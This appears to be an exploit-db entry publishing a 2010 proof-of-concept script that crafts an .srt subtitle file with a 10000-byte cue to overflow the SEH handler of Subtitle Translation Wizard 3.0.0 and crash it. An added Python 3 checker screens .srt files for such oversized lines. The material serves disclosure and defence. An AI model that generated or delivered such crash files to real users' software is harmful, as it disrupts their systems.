Subtitle Translation Wizard 3.0.0 – Overflow (SEH) (PoC)

  • Author: blake
    Date: 2010-06-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/13965/

    #!/usr/bin/python
    
    # Exploit Title: Subtitle Translation Wizard v3.0.0 SEH POC
    # Date: Jun 21, 2010
    # Author: Blake
    # Software Link: http://www.upredsun.com/subtitle-translation/download/st-wizard-setup.exe
    # Version: 3.0.0
    # Tested on: Windows Vista running in VirtualBox
    
    # SEH is overwritten but only unicode compatible pop pop ret addresses are in st-wizard.exe (SafeSEH).
    
    print "\n======================================"
    print " Subtitle Translation Wizard v3.0.0 DoS "
    print " Discovered by Blake "
    print "======================================\n"
    
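    # 10000 "A" bytes (0x41) used as the text of a single subtitle cue
    buffer = "\x41" * 10000
    
    print "[+] Creating malicious srt file"
    try:
        # Cue index and timing line are valid SRT; only the cue text is oversized
        file = open("poc.srt","w")
        file.write("1\n" + "00:01:48,549 --> 00:01:50,404\n" + buffer)
        file.close()
        print "[+] File created"
    except:
        print "[x] Could not create file"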
    
    raw_input("\nPress any key to exit...\n")
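
The PoC above writes a structurally valid cue (index and timing line) followed by one 10000-byte text line. The following is an added example, not part of the original exploit-db entry or the author's code: a Python 3 pre-screening check that flags .srt files of that shape before they reach a parser. The function name check_srt and the 1024-byte limit are assumptions made for this example.

```python
import re

# Assumed limit for this example; tune it to the subtitle content you accept.
MAX_LINE_BYTES = 1024
TIMING_RE = re.compile(
    rb"^\d{2}:\d{2}:\d{2},\d{3} --> \d{2}:\d{2}:\d{2},\d{3}\s*$"
)


def check_srt(data, max_line_bytes=MAX_LINE_BYTES):
    """Return a list of (line_number, reason) findings for raw .srt bytes."""
    if data.startswith(b"\xef\xbb\xbf"):
        data = data[3:]  # ignore a UTF-8 byte order mark
    findings = []
    expect = "index"  # state machine: index -> timing -> text
    for lineno, line in enumerate(data.split(b"\n"), start=1):
        line = line.rstrip(b"\r")
        # Length is checked first so an oversized line is reported
        # whichever part of the cue it appears in.
        if len(line) > max_line_bytes:
            findings.append((lineno, "line of %d bytes exceeds limit" % len(line)))
        if expect == "index":
            if not line.strip():
                continue  # blank separators between cues
            if not line.strip().isdigit():
                findings.append((lineno, "expected numeric cue index"))
            expect = "timing"
        elif expect == "timing":
            if not TIMING_RE.match(line):
                findings.append((lineno, "malformed timing line"))
            expect = "text"
        elif not line.strip():
            expect = "index"  # a blank line ends the cue text
    return findings


# Constructed samples: a well-formed file, and one with the same shape as the
# PoC output (valid index and timing followed by 10000 bytes of 0x41).
GOOD = (b"1\n00:01:48,549 --> 00:01:50,404\nHello there.\n\n"
        b"2\n00:01:51,000 --> 00:01:52,500\nSecond cue.\n")
POC_SHAPED = b"1\n00:01:48,549 --> 00:01:50,404\n" + b"\x41" * 10000

if __name__ == "__main__":
    for name, sample in (("good", GOOD), ("poc-shaped", POC_SHAPED)):
        print(name, check_srt(sample))
```

A length limit like this only screens input; it does not change how the application itself handles an oversized cue.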